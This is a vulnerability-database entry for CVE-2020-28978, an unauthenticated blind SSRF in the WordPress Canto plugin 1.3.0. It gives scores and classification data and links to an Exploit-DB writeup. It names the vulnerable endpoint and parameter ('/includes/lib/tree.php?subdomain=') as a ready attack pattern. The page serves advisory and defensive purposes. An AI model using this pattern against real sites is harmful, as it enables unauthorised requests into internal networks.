CVE-2020-28978

MEDIUM

WordPress Canto Plugin 1.3.0 - Blind SSRF via subdomain Parameter

Title source: manual
STIX 2.1

Exploitation Summary

EIP tracks 1 public exploit for CVE-2020-28978.

AI-analyzed exploit summary The exploit describes a Blind SSRF vulnerability in the WordPress Canto plugin 1.3.0, where an unauthenticated attacker can make requests to internal/external servers via the 'subdomain' parameter in multiple endpoints. The writeup includes technical details such as vulnerable parameters, endpoints, and reproduction steps.

Description

The Canto plugin 1.3.0 for WordPress contains blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/tree.php?subdomain=SSRF.

Exploits (1)

exploitdb WRITEUP
webappsmultiple
https://www.exploit-db.com/exploits/49189

The exploit describes a Blind SSRF vulnerability in the WordPress Canto plugin 1.3.0, where an unauthenticated attacker can make requests to internal/external servers via the 'subdomain' parameter in multiple endpoints. The writeup includes technical details such as vulnerable parameters, endpoints, and reproduction steps.

Classification
Writeup 90%
Attack Type
Ssrf
Complexity
Trivial
Reliability
Reliable
Target: WordPress Canto plugin 1.3.0
No auth needed
Prerequisites: Access to the target WordPress instance with the Canto plugin installed
devstral-2 · analyzed Feb 19, 2026 Full analysis →

References (5)

Core 5

Scores

CVSS v3 5.3
EPSS 0.1525
EPSS Percentile 96.3%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Details

CWE
CWE-918
Status published
Products (1)
canto/canto 1.3.0
Published Nov 30, 2020
Tracked Since Feb 18, 2026